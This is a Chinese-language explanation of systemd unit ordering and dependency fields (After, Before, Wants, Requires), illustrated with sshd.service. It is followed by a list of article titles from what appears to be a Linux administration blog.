[Unit] 区块：启动顺序与依赖关系

After 字段：表示如果 network.target 或 sshd-keygen.service 需要启动，那么 sshd.service 应该在它们之后启动。

相应地，还有一个 Before 字段，定义 sshd.service 应该在哪些服务之前启动。

注意，After 和 Before 字段只涉及启动顺序，不涉及依赖关系。

设置依赖关系，需要使用 Wants 字段和 Requires 字段

Wants 字段：表示 sshd.service 与 sshd-keygen.service 之间存在"弱依赖"关系，即如果"sshd-keygen.service"启动失败或停止运行，不影响 sshd.service 继续执行。

Requires 字段则表示"强依赖"关系，即如果该服务启动失败或异常退出，那么 sshd.service 也必须退出。

注意，Wants 字段与 Requires 字段只涉及依赖关系，与启动顺序无关，默认情况下是同时启动的。

Linux on Ricky

Articles

Dirty Frag

Articles

MAD Bugs: “cat readme.txt” is not safe in iTerm2

The core bug

Articles

SingleFlight

macOS 奇怪的安全扫码机制

如何在Surface Go 2安裝Fedora Linux，提昇低階平板效能

製作 Linux 開機碟

安裝 Linux

加裝 linux-surface 核心

KDE 桌面的虛擬鍵盤使用方式

Mosdns-X

安裝

設定

systemd

Docker 容器無法存取外網？nftables 下的 NAT 配置指南

獨立伺服器 CPU 頻率最大化配置指南

看看 CPU 現在用哪種模式

governor

確認核心到底用哪種驅動（Intel / AMD）

暫時拉滿效能

重啟後也保持高能

方案 A：最穩妥推薦

方案 B：systemd 自訂服務

透過LinuxServer.io打包的Docker映像檔，將桌面程式轉成網頁版，透過瀏覽器即可使用

適合舊電腦的輕量級 Linux 發行版

Add SFTP user and share directory

Add SFTP user and share directory

1. 建立共享資料夾(SFTP 使用的資料夾)

2. 建立使用者群組

3. 創建 qa_test_user 使用者並設定 qa_test_user 使用者的群組為 share01-test

4. 創建 qa_user 使用者並設定 qa_user 使用者的群組為 share01-prod

5. 設定權限

6. 設定 /etc/ssh/sshd_config

Container security fundamentals

調整系統使得 EMQX 可以支援 1M 連線

Linux Kernel Tuning

Erlang VM Tuning

EMQX Broker Tuning

有关 MTU 和 MSS 的一切

在 Linux 中偵測 RAID 資訊

lspci

lshw

smartctl

MegaCLI

lsscsi

廠商專用工具

測試伺服器是否易受 Shellshock 漏洞影響

Shellshock 漏洞

利用 Shellshock 漏洞

Shellshock 利用指令範例

從零開始的容器

容器檔案系統

chroot

如何刪除檔名含有不可列印字元的檔案

使用 ANSI-C Quoting

使用 Inode 編號

/etc/shadow 與建立 yescrypt、MD5、SHA-256、SHA-512 密碼雜湊

chage 與密碼期限

chpasswd 與密碼

如何在別名指令上使用 which

type

GNU which

Shell Script 最佳實務

重點

範本

命令列的藝術

在 Shell 中輸出 ASCII 藝術字

banner

FIGlet: Frank, Ian, and Glenn’s Letters

TOIlet: FIGlet With More Options

如何讓終端輸出覆蓋同一行

問題簡介

「魔法碼」: \033[0K\r

即時監控網路介面上的 HTTP 請求

tcpflow

httpry

「魔法碼」: `\033[0K\r`

modify `~/.vnc/xstartup`

`dmidecode -s system-product-name`

`/dev/disk/by-id`

然后，将下面一行添加到服务器配置文件 `/etc/ssh/sshd_config`

使用 `df -ah` 命令 `du -h --max-depth=1`